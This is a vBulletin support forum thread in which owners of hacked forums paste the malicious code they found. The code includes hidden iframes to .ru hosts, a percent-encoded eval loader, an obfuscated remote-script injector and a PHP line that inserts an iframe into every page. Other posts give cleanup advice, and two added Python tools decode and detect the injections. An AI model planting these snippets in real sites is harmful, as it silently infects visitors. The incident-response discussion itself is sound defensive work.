vBulletin 3.8.4 has been hacked !!!

  • mijack
    New Member
    • Aug 2009
    • 4
    • 3.8.x

    vBulletin 3.8.4 has been hacked !!!

    Hello,

    My website has been hacked !!!

    There is a code at the end (bottom) of index.php

    Code:
    <script language="JavaScript" type="text/javascript">
    function getfromDOM(containerid)
    {var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
    do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
    while(element1!==container.lastChild)
    return content;
    }
    var ff_b = document.createElement("strong");
    ff_b.id = "YuPi55";
    ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
    ff_b.style.visibility = "hidden";
    document.getElementsByTagName("body")[0].appendChild(ff_b);
    var ff_iframe = document.createElement("iframe");
    ff_iframe.id = "JeT";
    ff_iframe.name = "JeT";
    ff_iframe.style.visibility = "hidden";
    ff_iframe.src=getfromDOM("YuPi55");
    document.getElementsByTagName("body")[0].appendChild(ff_iframe);
    </script>
    y

    Code:
    <iframe src="http://3cy.ru:8080/index.php" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>
    I don't know if other files have been hacked.

    I use 3.8.4. with DownloadsII mod

    Can you help me?

    Thank you
  • renep
    Senior Member
    • Aug 2005
    • 596
    • 3.8.x

    #2
    Re-install and read: http://www.vbulletin.com/forum/showthread.php?t=194701
    "The lurking suspicion that something could be simplified is the world's richest source of rewarding challenges"
    - Edsger Dijkstra

    Comment

    • mijack
      New Member
      • Aug 2009
      • 4
      • 3.8.x

      #3
      If I reinstall, do I have to use impex? Or do I have to use the name of the actual database when I'm installing?

      I have 85.000 users and I don't want to lose them....

      Thank you

      Comment

      • Desibabu19
        Member
        • Feb 2006
        • 44

        #4
        Sorry to hear that.
        What type of mistake on the admin side leads to such a hack?
        I'd just like to learn how to prevent these attacks.

        Comment

        • Lynne
          Former vBulletin Support
          • Oct 2004
          • 26255

          #5
          Just reupload your backup database. You should not have to use impex for that.

          Please don't PM or VM me for support - I only help out in the threads.
          vBulletin Manual & vBulletin 4.0 Code Documentation (API)
          Want help modifying your vbulletin forum? Head on over to vbulletin.org
          If I post CSS and you don't know where it goes, throw it into the additional.css template.

          W3Schools <- awesome site for html/css help

          Comment

          • fbriceno97
            New Member
            • Jul 2008
            • 6
            • 3.7.x

            #6
            Originally posted by mijack
            Hello,

            My website has been hacked !!!

            There is a code at the end (bottom) of index.php

            Code:
            <script language="JavaScript" type="text/javascript">
            function getfromDOM(containerid)
            {var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
            do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
            while(element1!==container.lastChild)
            return content;
            }
            var ff_b = document.createElement("strong");
            ff_b.id = "YuPi55";
            ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
            ff_b.style.visibility = "hidden";
            document.getElementsByTagName("body")[0].appendChild(ff_b);
            var ff_iframe = document.createElement("iframe");
            ff_iframe.id = "JeT";
            ff_iframe.name = "JeT";
            ff_iframe.style.visibility = "hidden";
            ff_iframe.src=getfromDOM("YuPi55");
            document.getElementsByTagName("body")[0].appendChild(ff_iframe);
            </script>
            y

            Code:
            <iframe src="http://3cy.ru:8080/index.php" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>
            I don't know if other files have been hacked.

            I use 3.8.4. with DownloadsII mod

            Can you help me?

            Thank you

            My site was hacked just the same... just pointing to another server in the iframe code.

            But I was using 3.8.1, so if this happens with 3.8.4 and 3.8.1 there is a hole somewhere very old letting this happen.

            Basically they modified all the PHP and HTML files with that code.

            What is the position of vbulletin about this?

            Comment

            • Zachery
              Former vBulletin Support
              • Jul 2002
              • 59097

              #7
              Our position is there is no known exploit; if you have evidence of an actual exploit, please report it. Likely there is a good chance that the exploit was elsewhere on the server and vBulletin was the one defaced.

              Comment

              • mentalrz
                Senior Member
                • Sep 2004
                • 538
                • 1.1.x

                #8
                encoded part outputs at

                Code:
                document.write("<iframe src='http://000007.ru/in.cgi?7' style='display:none;'></iframe>");
                just for your reference

                Comment

                • Steve Machol
                  Former Customer Support Manager
                  • Jul 2000
                  • 154488

                  #9
                  All the hacks I've seen like this were done through the server.

                  Please see this thread on how to make your vBulletin more secure:



                  If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
                  Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                  Change CKEditor Colors to Match Style (for 4.1.4 and above)

                  Steve Machol Photography


                  Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                  Comment

                  • gedankenberg
                    New Member
                    • Oct 2009
                    • 1
                    • 3.8.x

                    #10
                    Hello,

                    Some of my vBulletin 3.8.4 patch level 1 (German) have also been hacked:

                    Code:
                    <script>/*GNU GPL*/ try{window.onload = function(){var Ju5b7bu89al = document.createElement('s#$c@@r$)i!$p)t!('.replace(/\(|@|\!|\$|#|\)|\^|&/ig, ''));var Plcsu1uj9eo04 = 'U1xil41i86oe';Ju5b7bu89al.setAttribute('type', 't&@&$e)#)x!$)t@^/!!#j!$@a((#v(a#&)s(^@c$@)r^&i(#)p&$#t)'.replace(/\!|\)|&|#|\$|\(|\^|@/ig, ''));Ju5b7bu89al.setAttribute('src',  'h!##t&t$p!@:!#/^&)/(^$o$$^v((h^(-&$n^^e@!t@(.$$h#@a#)^r#d#(#s($&)e!&^!x)!#^t&u^&@b$e!&#)^.^)!^c)))o$!m&&.@&$s#o)&n$$($#g$!s$&-$&&p##^k&$(&!.#@&t@^h&)!e!(&m^#)o&$$^b$@)i&)l@@^e@(^w^(i$(#n(!d$!o&w&.&)$r@&((u@@:)8^&0()8@@0#&()/)@!^g!)&o)(^@o@(g@^l)#$e).#&n#$#(o&(((/(g(&o#!##o$$#g&$@)!l))e$&$^(.^&n(&!&o()!@/&(#$g)&)@o)^o!#g!$$(l#$e(.$c^##$o#!^!m^)/&^!$@z)y&$)l)(((o^#^m&^!#.^#^#c@o)^m)($)/#m((-(&w$(.$c(#o!m#@$/(#^&'.replace(/\!|\)|\(|@|&|\$|\^|#/ig, ''));Ju5b7bu89al.setAttribute('defer', 'd@!)&e$(!f&(e!)^r)&!'.replace(/&|\)|#|\$|@|\^|\(|\!/ig, ''));Ju5b7bu89al.setAttribute('id', 'L!3###$d!##w(@o^@&h^(s@&(&8#@&!v$&$#u^)u&('.replace(/\!|&|\(|#|\$|\)|\^|@/ig, ''));document.body.appendChild(Ju5b7bu89al);}} catch(Pz68f7gfr80sy) {}</script>
                    <!--e27f528bc0f1747ea9638a535ca450f8-->

                    Comment
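An added example, not part of any post in this thread: a static decoder for the two obfuscation styles shown above, the %XX-encoded `unescape` payload from post #1 (decoded by hand in post #8) and the junk-character `.replace()` strings from post #10. It recovers the hidden URLs without evaluating any JavaScript; `deobfuscate` is a hypothetical name and the sample snippets and hosts are constructed placeholders.

```python
import re
from urllib.parse import unquote

# 'literal'.replace(/a|b|.../ig, '') as used by the loader in post #10
JUNK_CALL = re.compile(
    r"""(['"])((?:(?!\1).)*)\1\s*\.replace\(\s*/((?:\\.|[^/\\])+)/[gim]*\s*,\s*(['"])\4\s*\)""",
    re.S)
# Accept only filters that are an alternation of single punctuation characters,
# so a pattern taken from hostile input is never compiled blindly.
ALT = r"(?:\\[^\w\s]|[^\w\s\\|()\[\]{}.*+?^$])"
SAFE_FILTER = re.compile(ALT + r"(?:\|" + ALT + r")*")
PCT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")   # unescape() input, post #1
URL = re.compile(r"""https?://[^\s'"<>)]+""", re.I)


def deobfuscate(snippet):
    """Return (decoded_layers, urls) for an injected snippet; nothing is eval'd."""
    layers = []
    for m in PCT_RUN.finditer(snippet):
        # latin-1 mirrors JavaScript unescape() for %XX (%uXXXX is not handled)
        layers.append(unquote(m.group(0), encoding="latin-1"))
    for m in JUNK_CALL.finditer(snippet):
        literal, js_filter = m.group(2), m.group(3)
        if SAFE_FILTER.fullmatch(js_filter):
            layers.append(re.sub(js_filter, "", literal, flags=re.I))
    urls = sorted({u for text in [snippet, *layers] for u in URL.findall(text)})
    return layers, urls


# Constructed samples (placeholder hosts), shaped like the code in posts #1 and #10.
INNER = ("document.write(\"<iframe src='http://tds.example.invalid/in.cgi?7' "
         "style='display:none;'></iframe>\");")
SAMPLE_PCT = ('<div id="CFI" style="display:none">'
              + "".join("%%%02x" % ord(c) for c in INNER)
              + '</div><script>var nJQ=eval,GaB=unescape;'
              'nJQ(GaB(document.getElementById("CFI").innerHTML));</script>')
SAMPLE_JUNK = r"""<script>var s = document.createElement('s#c@r$i!p^t'.replace(/\!|@|#|\$|\^/ig, ''));
s.setAttribute('src', 'h#t!t@p$:^/!/#l@o$a^d!e#r@.$e^x!a#m@p$l^e!.#i@n$v^a!l#i@d$:^8!0#8@0$/^i!n#.@j$s'.replace(/\!|@|#|\$|\^/ig, ''));
document.body.appendChild(s);</script>"""

if __name__ == "__main__":
    for sample in (SAMPLE_PCT, SAMPLE_JUNK):
        print(deobfuscate(sample))
```

The recovered URLs are what you would give your host to search for in proxy, DNS and web server logs.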

                    • HolyKiller
                      Senior Member
                      • Dec 2006
                      • 105
                      • 3.6.x

                      #11
                      When I am reading this thread, my NOD32 says:

                      23.2.2010 21:44:09 HTTP filter archive http://www.vbulletin.com/forum/showt...ighlight=impex JS/TrojanDownloader.Agent.NRL trojan connection terminated Threat was detected upon access to web by the application: firefox.exe.

                      Comment

                      • borbole
                        Senior Member
                        • Feb 2010
                        • 3074
                        • 4.0.0

                        #12
                        Clean up all your forum files by overwriting them with a fresh set from the vB download package for your version. Check your server space for anything out of the ordinary. Check all your other files to see if they have been infected. Change all the login info (FTP, forum admin, CP of your host, etc.). And last but not least, ask your host to check their access logs so they can pinpoint the exact way they got in and not do guesswork.

                        Comment

                        • sungerr
                          Member
                          • Jan 2009
                          • 59

                          #13
                          PHP code in includes/functions.php
                          ==================
                          // parse PHP include ##################
                          ($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
                          ---

                          Me too, I got hacked by an iframe !!!!!!!!!!!!

                          I found it in functions.php

                          Only in the /forum; I have a portal CMS web and it didn't get hacked !! Is that an exploit ?!

                          Comment

                          • borbole
                            Senior Member
                            • Feb 2010
                            • 3074
                            • 4.0.0

                            #14
                            Originally posted by sungerr
                            PHP code in includes/functions.php
                            ==================
                            // parse PHP include ##################
                            ($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
                            ---

                            Me too, I got hacked by an iframe !!!!!!!!!!!!

                            I found it in functions.php

                            Only in the /forum; I have a portal CMS web and it didn't get hacked !! Is that an exploit ?!

                            What version of vb do you have?

                            Comment

                            • Endlesskiss
                              Member
                              • Dec 2008
                              • 92

                              #15
                              I've been using 3.8.4 for a while and got defaced once. I suggest you read more info about the 'Gumblar' virus (made in China, but works well), and run Avast! on your server; it's free and it works on Linux, and most likely it will find some stuff like c99.php (a shell) on your server, which allows hackers to edit files on your server.

                              Basically, I've tried MANY things and none of them actually worked (No XSS nor SQLi).

                              Comment
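An added example, not from any poster or from vBulletin: one way to do the file check that posts #6, #12, #13 and #15 describe, by diffing the deployed forum tree against a clean copy extracted from the download package and flagging the injection markers quoted in this thread. `triage`, `demo` and `MARKERS` are hypothetical names, and the sample files are constructed in a temporary directory.

```python
import re
import tempfile
from pathlib import Path

WEB_EXT = {".php", ".html", ".htm", ".js"}
# Markers modelled on the snippets quoted in this thread
MARKERS = {
    "hidden-iframe": re.compile(
        rb"<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none)", re.I),
    "eval-unescape": re.compile(rb"\beval\b[^;]{0,200}\bunescape\b", re.I),
    "output-rewrite": re.compile(
        rb"preg_replace\s*\(.{0,80}?<body.{0,300}?<iframe", re.I | re.S),
}


def triage(deployed, clean):
    """Diff a deployed forum tree against a clean extracted package."""
    deployed, clean = Path(deployed), Path(clean)
    report = {"modified": [], "extra": [], "markers": {}}
    for path in sorted(p for p in deployed.rglob("*") if p.is_file()):
        if path.suffix.lower() not in WEB_EXT:
            continue
        rel = path.relative_to(deployed).as_posix()
        data, ref = path.read_bytes(), clean / rel
        if not ref.is_file():
            report["extra"].append(rel)      # not shipped: upload, mod or dropped file
        elif ref.read_bytes() != data:
            report["modified"].append(rel)
        else:
            continue                         # byte-identical to the package
        hits = [name for name, rx in MARKERS.items() if rx.search(data)]
        if hits:
            report["markers"][rel] = hits
    return report


def demo():
    """Triage a constructed clean/deployed pair built in a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "includes").mkdir(parents=True)
            (root / "index.php").write_text("<?php require 'global.php';\n")
            (root / "includes/functions.php").write_text("<?php // stock\n")
        with (live / "index.php").open("a") as fh:   # appended, as in post #1
            fh.write('<iframe src="http://x.example.invalid/" style="visibility: hidden"></iframe>')
        (live / "includes/c99.php").write_text("<?php // placeholder\n")
        return triage(live, clean)
```

Site-specific files (configuration, installed mods such as the DownloadsII mod mentioned in post #1) will legitimately appear as modified or extra, so review both lists rather than treating every entry as an infection.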
